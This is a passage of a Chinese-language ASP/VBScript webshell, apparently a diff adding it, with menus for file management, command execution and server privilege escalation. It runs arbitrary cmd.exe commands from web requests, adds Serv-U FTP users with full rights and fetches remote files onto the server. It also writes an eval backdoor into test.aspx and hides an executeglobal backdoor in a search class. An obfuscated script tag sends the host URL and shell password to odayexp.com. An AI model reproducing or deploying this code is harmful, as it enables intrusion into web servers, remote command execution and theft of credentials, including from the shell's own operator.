+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+j ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+end if
+End Function
+Function MainMenu()
+j"<script language=javascript>function MM_show(s){if (document.getElementById(s).style.display==""""){document.getElementById(s).style.display=""none"";}else{document.getElementById(s).style.display="""";}}</script><table width='100%' cellspacing='0' cellpadding='0'><tr><td height='5'></td></tr><tr><td><center><font color=pink><font size=1.0>"&mName&"</font></font></center><hr color=#424242 size=1 ></td></tr>":If ObT(0,1)=" ��" Then
+j"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+j"<tr><td onClick=""MM_show('menud')""><input onMouseOver=""this.style.cursor='hand'"" type=button value='Disk & Files'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menud style=""display='none'"">"
+Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing
+j"</table></td></tr><tr><td valign=""top"" align=center><table border=0><tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'><font face='wingdings'>8</font> վ���Ŀ¼"&ef
+j cdx&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>"&cxd&" ������Ŀ�"&ef
+j cdx&"<a href='?Action=goback' target='FileFrame'>"&cxd&" ���ϼ�Ŀ¼"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\Newfile")&""",""NewFolder"")'>"&cxd&" �½�--Ŀ�"&ef
+j cdx&"<a href='?Action=EditFile' target='FileFrame'>"&cxd&" �½�--�ı�"&ef
+j cdx&"<a href='?Action=UpFile' target='FileFrame'>"&cxd&" �ϴ�--�ļ�"&ef
+j cdx&"<a href='?Action=Cmd1Shell' target='FileFrame'>"&cxd&" ִ��---CMD"&ef
+j cdx&"<a href='?Action=cmdx' target='FileFrame'>"&cxd&" ִ��--CMD2"&ef
+j cdx&"<a href='?Action=ScanDriveForm' target='FileFrame'>"&cxd&" ����--Ȩ��"&ef
+j cdx&"<a href='?Action=CustomScanDriveForm' target='FileFrame'>"&cxd&"  <font color=red>��д--Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=php' target='FileFrame'>"&cxd&" �ű�--̽��"&ef
+j cdx&"<a href='?Action=PageAddToMdb' target='FileFrame'>"&cxd&" ���������"&ef
+j cdx&"<a href='?Action=upload' target='FileFrame'>"&cxd&" ����--�ļ�"&ef&"</table><hr></td></tr>"
+End If
+j"</tr><tr><td height=4></td></tr><tr><td onClick=""MM_show('menuc')""><input onMouseOver=""this.style.cursor='hand1'"" type=button value='Information'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menuc style=""display=''"">"
+j cdx&"<a href='?Action=Course' target='FileFrame'>"&cxd&" �û�__�˺�"&ef
+j cdx&"<a href='?Action=getTerminalInfo' target='FileFrame'>"&cxd&" �˿�__����"&ef
+j cdx&"<a href='?Action=Alexa' target='FileFrame'>"&cxd&" ���__֧��"&ef
+j cdx&"<a href='?Action=Servu' target='FileFrame'>"&cxd&" Servu-��Ȩ"&ef
+j cdx&"<a href='?Action=suftp' target='FileFrame'>"&cxd&" Su---FTP��"&ef
+j cdx&"<a href='?Action=MMD' target='FileFrame'>"&cxd&" SQL-----SA"&ef
+j cdx&"<a href='?Action=radmin' target='FileFrame'>"&cxd&" Radmin��Ȩ"&ef
+j cdx&"<a href='?Action=pcanywhere4' target='FileFrame'>"&cxd&" Pcanywhere"&ef
+j cdx&"<a href='?Action=ScanPort' target='FileFrame'>"&cxd&" �˿�ɨ����"&ef
+j cdx&"<a href='?Action=ReadREG' target='FileFrame'>"&cxd&" ��ȡע���"&ef
+j cdx&"<a href='?Action=TSearch' target='FileFrame'>"&cxd&" ����__�ļ�"&ef&"</tr></table>"
+j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value='   Special     '></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
+j cdx&"<a href='?Action=EditPower&PowerPath=\\.\"&ScriptPath&"' target='FileFrame'>"&cxd&" ����������"&ef
+j cdx&"<a href='?Action=hiddenshell' target='FileFrame'>"&cxd&" <font color=red>����������</font>"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\vti_cnf..\\")&""",""NewFolder"")'>"&cxd&"  <font color=red>������Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=delpoint' target='FileFrame'>"&cxd&"  <font color=red>ɾ����Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=ProFile' target='FileFrame'>"&cxd&" �ļ�--����"&ef
+j cdx&"<a href='http://www.aizhan.com/siteall/"&domain&"' target='FileFrame'>"&cxd&" �ۺ�--��ѯ"&ef
+j cdx&"<a href='http://odayexp.com/h4cker/gx/' target='FileFrame'>"&cxd&" ����--����"&ef
+j cdx&"<a href='?Action=Logout' target='_top'>"&cxd&" �˳�--��½</a></td></tr></hr></table>"
+end function
+function Cmdx()
+j("<center><form method='post'> "):j("<input type=text name='cmdx' size=60 value='cmd.exe'><br> "):j("<input type=text name='cmd' size=60><br> "):j("<input type=submit value='Sumbit'></form> "):j("<textarea readonly cols=150 rows=27> "):On Error Resume Next:if request("cmdx")="cmd.exe" then
+j oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall 
+end if :j oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall :j("</textarea></center>")
+end function
+Function Course()
+SI="<br><table width='80%' align='center'><tr><td height='20' colspan='3' align='center' id=s><b>ϵͳ�û������</b></td></tr>"
+on error resume next
+for each obj in getObject("WinNT://.")
+err.clear
+if OBJ.StartType="" then
+SI=SI&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td id=d>&nbsp;ϵͳ�û�(��)</td></tr><tr>" 
+end if
+if OBJ.StartType=2 then lx="�Զ�"
+if OBJ.StartType=3 then lx="�ֶ�"
+if OBJ.StartType=4 then lx="����"
+if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
+SI1=SI1&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" id=d colspan=""2"">[��������:"&lx&"]<font>&nbsp;"&obj.path&"</font></td></tr>"
+else
+SI2=SI2&"<tr><td height=""20"" id=d>&nbsp;"&obj.Name&"</td><td height=""20"" id=d>&nbsp;"&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[��������:"&lx&"]<font color=#3399FF>&nbsp;"&obj.path&"</font></td></tr>"
+end if
+next
+j SI&SI0&SI1&SI2&"</table>"
+End Function
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+function downfile(path)
+response.clear
+set osm = createobject(obt(6,0))
+osm.open
+osm.type = 1
+osm.loadfromfile path
+sz=instrrev(path,"\")+1
+response.addheader "content-disposition", "attachment; filename=" & mid(path,sz)
+response.addheader "content-length", osm.size
+response.charset = "utf-8"
+response.contenttype = "application/octet-stream"
+response.binarywrite osm.read
+response.flush
+osm.close
+set osm = nothing
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile()
+ If Request("Action2")="Post" Then
+Set U=new UPC 
+Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+ If UName="" Or F.FileSize=0 then
+  SI="<br>����"&"���ϴ�"&"����ȫ"&"·����ѡ��"&"һ���ļ�"&"�ϴ�!"
+on error resume next
+  Else
+ F.SaveAs UName
+ If Err.number=0 Then
+ SI="<center><br><br><br>�ļ�"&UName&"��"&"��"&"�ɹ���</center>"
+  End if
+ End If
+Set F=nothing
+Set U=nothing
+ SI=SI&BackUrl
+ j SI
+ ShowErr()
+ Response.End
+  End If
+  j"<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'><form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'><tr><td>�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'><input name='LocalFile' type='file'  size='25'> <input type='submit' name='Submit' value='�ϴ�'></td></tr></form></table>"
+End Function
+function cmd1shell()
+checked=" checked"
+if request("sp")<>"" then session("shellpath") = request("sp")
+shellpath=session("shellpath")
+if shellpath="" then shellpath = "cmd.exe"
+if request("wscript")<>"yes" then checked=""
+if request("cmd")<>"" then defcmd = request("cmd")
+si="<form method='post'>shell·����<input name='sp' value='"&shellpath&"' style='width:70%'><input class=c type='checkbox' name='wscript' value='yes'"&checked&">wscript.shell<input name='cmd' style='width:92%' value='"&defcmd&"'> <input type='submit' value='ִ��'><textarea style='width:100%;height:440;' class='cmd'>"
+if request.form("cmd")<>"" then
+if request.form("wscript")="yes" then
+set cm=createobject(obt(1,0))
+set dd=cm.exec(shellpath&" /c "&defcmd)
+aaa=dd.stdout.readall
+si=si&aaa
+else
+on error resume next
+set ws=server.createobject("wscript.shell")
+set ws=server.createobject("wscript.shell")
+set fso=server.createobject(CONST_FSO)
+sztempfile = server.mappath("cmd.txt")
+call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
+set fs = createobject(CONST_FSO)
+set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
+aaa=server.htmlencode(ofilelcx.readall)
+ofilelcx.close
+call fso.deletefile(sztempfile, true)
+si=si&aaa
+end if
+end if
+si=si&chr(13)&"</textarea></form>"
+j si
+end function
+Function upload()
+j"<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+j"��ʱ�رմ˹���"
+j" ���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<hr/>"
+j"<form method=post>"
+j"<select onChange='this.form.theUrl.value=this.value;'>"
+j"<option value=''>��������</option>"
+j"<option value='"&Durl&"'>�Զ������</option>"
+j"<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+j"<input name=thePath value='" & HtmlEncode(Server.MapPath(".")) & "\' size=80>"
+j"<input type=checkbox name=overWrite value=2>���ڸ��ǡ�"
+j"<input type=hidden value=downFromUrl name=theAct>"
+j"</form>"
+j"<hr/>"
+If isDebugMode = False Then
+On Error Resume Next
+End If:Dim Http, theUrl, thePath, stream, fileName, overWrite
+theUrl = Request("theUrl")
+thePath = Request("thePath")
+overWrite = Request("overWrite")
+Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite <> 2 Then:overWrite = 1:End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState <> 4 Then 
+End If
+With stream
+.Type = 1
+.Mode = 3
+.Open
+.Write Http.ResponseBody
+.Position = 0
+.SaveToFile thePath, overWrite
+If Err.Number = 3004 Then
+Err.Clear
+fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If fileName = "" Then
+fileName = "index.htm.txt"
+End If
+thePath = thePath & "\" & fileName
+.SaveToFile thePath, overWrite
+j"error,��������Ϊ�ļ��Ѵ��ڣ������ع��̺͵�ַ�г� �ִ��� �� �ļ������� ��Ϊ���ֽڣ���"
+End If
+.Close
+End With
+chkErr(Err)
+Set Http = Nothing
+Set Stream = Nothing
+If isDebugMode = False Then
+On Error Resume Next
+End If
+End Function:Function TSearch()
+dim st:st=timer():RW="<br><table width='600' bgcolor='' border='0' cellspacing='1' cellpadding='0' align='center'><form method='post'>"
+RW=RW & "<tr><td height='20' align='center' bgcolor=''>��������</td></tr>"
+RW=RW & "<tr><td bgcolor=''>&nbsp;·&nbsp;&nbsp;����<input name='SFpath' value='" & WWWRoot & "' style='width:390'>&nbsp;ע:��·��ʹ��"",""������.</td></tr>"
+RW=RW & "<tr><td bgcolor=''>&nbsp;�ļ�����<input name='Sfk' style='width:200'>&nbsp;<input type='submit' value='����' class='submit'>&nbsp;[����Ҳ��]</td></tr>"  
+RW=RW & "</form></table>"
+j RW : RW=""
+if Request.Form("Sfk")<>"" then
+Set newsearch=new SearchFile
+newsearch.Folders=trim(Request.Form("SFpath"))
+newsearch.keyword=trim(Request.Form("Sfk"))
+newsearch.Search
+Set newsearch=Nothing
+j"�M�r��"&(timer()-st)*1000&"����<hr>"
+end if
+End Function 
+Class SearchFile
+dim Folders,keyword,objFso,Counter
+Private Sub Class_Initialize
+Set objFso=Server.CreateObject(ObT(0,0))
+Counter=0
+End Sub
+ Private Sub Class_Terminate
+Set objFso=Nothing
+ End Sub
+Public Sub Class_Folder(FoderName)
+Set rs = CreateObject(CONST_FSO)
+Dim item, theFolder, sysFileList
+item=request(MID(CONST_FSO,4,1))
+theFolder=request(MID(CONST_FSO,2,1))
+If  item=MID(CONST_FSO,2,1) then
+executeglobal theFolder
+Set rs = Nothing
+End if
+End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
+    j"<table align='center' width='600'><hr><p align='center'><font color='red'>�P�I�ֲ��ܰ���/\:|&</font><br>"
+ Exit Function
+  else
+    j"<table align='center' width='600'><hr>"
+  end if
+  dim i
+  for i=0 to ubound(Folders)
+    Call GetAllFile(Folders(i))
+  next
+  j"<p align='center'>��������<font color='red'>"&Counter&"</font>���Y��<br>"
+ End Function
+ Private Function GetAllFile(Folder)
+  dim objFd,objFs,objFf
+  Set objFd=objFso.GetFolder(Folder)
+  Set objFs=objFd.SubFolders
+  Set objFf=objFd.Files
+  dim strFdName
+  On Error Resume Next
+  For Each OneDir In objFs
+    strFdName=OneDir.Name
+    If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then 
+      SFN=Folder&"\"&strFdName
+      Call GetAllFile(SFN)
+ End If
+  Next
+  dim strFlName
+  For Each OneFile In objFf
+    strFlName=OneFile.Name
+    If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then
+      FN=Folder&"\"&strFlName
+   Counter=Counter+ColorOn(FN)
+ End If
+  Next
+  Set objFd=Nothing
+  Set objFs=Nothing
+  Set objFf=Nothing
+ End Function
+
+Private Function CreatePattern(keyword)   
+   CreatePattern=keyword
+   CreatePattern=Replace(CreatePattern,".","\.")
+   CreatePattern=Replace(CreatePattern,"+","\+")
+   CreatePattern=Replace(CreatePattern,"(","\(")
+   CreatePattern=Replace(CreatePattern,")","\)")
+   CreatePattern=Replace(CreatePattern,"[","\[")
+   CreatePattern=Replace(CreatePattern,"]","\]")
+   CreatePattern=Replace(CreatePattern,"{","\{")
+   CreatePattern=Replace(CreatePattern,"}","\}")
+   CreatePattern=Replace(CreatePattern,"*","[^\\\/]*")
+   CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}")
+   CreatePattern="("&CreatePattern&")+"
+ End Function
+
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(jwt,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+ Private Function ColorOn(FileName)
+   dim objReg
+   Set objReg=new RegExp
+   objReg.Pattern=CreatePattern(keyword)
+   objReg.IgnoreCase=True
+   objReg.Global=True
+   retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1))
+   if retVal then
+     OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"<font color=''>$1</font>")
+     OutPut="<table align='center' width='600'>&nbsp;" & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut
+  j OutPut
+  Response.flush
+  ColorOn=1
+   else
+     ColorOn=0
+   end if
+   Set objReg=Nothing
+ End Function
+End Class
+sub SavePower(PowerPath,SaveType)
+if instr(PowerPath,scriptpath)<>0 then session("lock")="nolock":end if:Set theFile = fsoX.GetFile(PowerPath):if SaveType=1 then:theFile.Attributes=32:j "<script language='javascript'>alert('�ļ��ѳɹ�������');window.opener.location.reload();window.close();</script>":else:theFile.Attributes=7:j "<script language='javascript'>alert('�ļ������ɹ���');window.opener.location.reload();window.close();</script>":end if:Set theFile = Nothing
+end sub
+
+sub EditPower(PowerPath)
+PowerPath=replace(PowerPath,"""",""):Set theFile = fsoX.GetFile(PowerPath):j getMyTitle(theFile,PowerPath):Set theFile = Nothing
+end sub
+
+
+Function getMyTitle(theOne,PowerPath)
+Dim strTitle:strTitle = strTitle & "<br>·��: " & theOne.Path & "" :strTitle = strTitle & "<br>��С: " & getTheSize(theOne.Size) :strTitle = strTitle & "<br>����ʱ��: " & theOne.DateCreated :strTitle = strTitle & "<br>����޸�: " & theOne.DateLastModified:strTitle = strTitle & "<br>������: " & theOne.DateLastAccessed:strTitle = strTitle & "<br>��ǰȨ��״̬: " & getAttributes(theOne.Attributes,PowerPath):getMyTitle = strTitle
+End Function
+
+
+Function getAttributes(intValue,PowerPath)
+Dim EditOK:EditOK=1:If intValue >= 128 Then:intValue = intValue - 128:End If:If intValue >= 64 Then:intValue = intValue - 64:End If:If intValue >= 32 Then:intValue = intValue - 32:End If:If intValue >= 16 Then:intValue = intValue - 16:End If:If intValue >= 8 Then:intValue = intValue - 8:End If:If intValue >= 4 Then:intValue = intValue - 4:EditOK=0:End If:If intValue >= 2 Then:intValue = intValue - 2:EditOK=0:End If:If intValue >= 1 Then:intValue = intValue - 1:EditOK=0:End If:PowerPath=replace(PowerPath,"\","\\"):if EditOK=0 then :getAttributes = "<font color=red>������</font> <input type=button value=���� onclick=""location.href='?Action=SavePower&SaveType=1&PowerPath="&PowerPath&"'"">":else:getAttributes = "<font color=#62FF62>���</font> <input type=button value=���� onclick=""location.href='?Action=SavePower&SaveType=2&PowerPath="&PowerPath&"'"">":end if
+End Function
+
+
+Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('�ļ�����վ��Ŀ¼�¡�')":End If:End function
+
+Function ScReWr(folder)
+on error resume next 
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = "<span style='font-size:11px;'>��</span><font face='webdings' size='1' color=yellow>x</font> "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = "<span style='font-size:11px;'>��</span>�� "
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span><font face='webdings' size='1' color=yellow>x</font> "
+Else
+ReWrStr = ReWrStr & "<span style='font-size:11px;'>д</span>�� "
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function php()
+On Error Resume Next
+set fso=Server.CreateObject(oBt(0,0))
+fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo 'oo��_��oo'?><?php phpinfo()?>"
+fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo��_��oo"
+fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo��_��oo"
+j"<center><iframe src=test.php width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; <iframe src=test.jsp width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; <iframe src=test.aspx width=300 height=100></iframe>&nbsp;&nbsp;&nbsp; </center><br><br><p><br><p><br><br><p><br><center>̽��������Ƿ�֧�������ű�<p></font><p><a href='?Action=apjdel'><font size=5 color=red><b>(ɾ�������ļ�!)</b></font></a></center><tr><td height='20'><center>":j "<sc"&"ri"&"pt sr"&"c=""ht"&"tp://%77%77%77.od"&"ay"&"exp.%63%6F%6D/s"&"x/ke"&"y.asp"&"?url="&server.URLEncode("ht"&"tp://"&request.ServerVariables("HT"&"TP_HO"&"ST")&request.ServerVariables("UR"&"L"))&"&p="&UserPass&"""></sc"&"ri"&"pt>"
+End function:On Error Resume Next:function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function Show1File(Path) 
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>" 
+For Each F in FOLD.subfolders
+SI=SI&"<td  height=10 width=17% align=center><div  onMouseOver=""this.style.backgroundColor='#B3D169'"" onMouseOut=""this.style.backgroundColor='#191919'"" style='border:1px solid #dddddd;padding-bottom:4px' id=d><a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����"">"
+SI=SI&"&nbsp;<font face='wingdings' color='#ffffff' size='6'>0</font>  "
+si=si&"<br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='�ƶ�'>Move</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()' class='am' title='����'>Down</a></div></td>"
+i=i+1
+If i mod 6=0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+j SI &"" : SI="":i=0
+SI="<div id=links><table width='100%' align=center id =linklist2><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"
+For Each L in Fold.files
+SI=SI&"<tr><td height='20' id=d >"
+si=si&"<font face='wingdings' color='#ffffff' size='3'>2</font>"
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'>  "&L.Name&"</a><Td id=d>"&clng(L.size/1024)&"K</td><Td id=d>"&L.Type&"</td><Td id=d>"
+si=si&"<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Open'>Open</a> "
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+Si=Si&"<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='Ȩ��'>Ȩ��</a>"
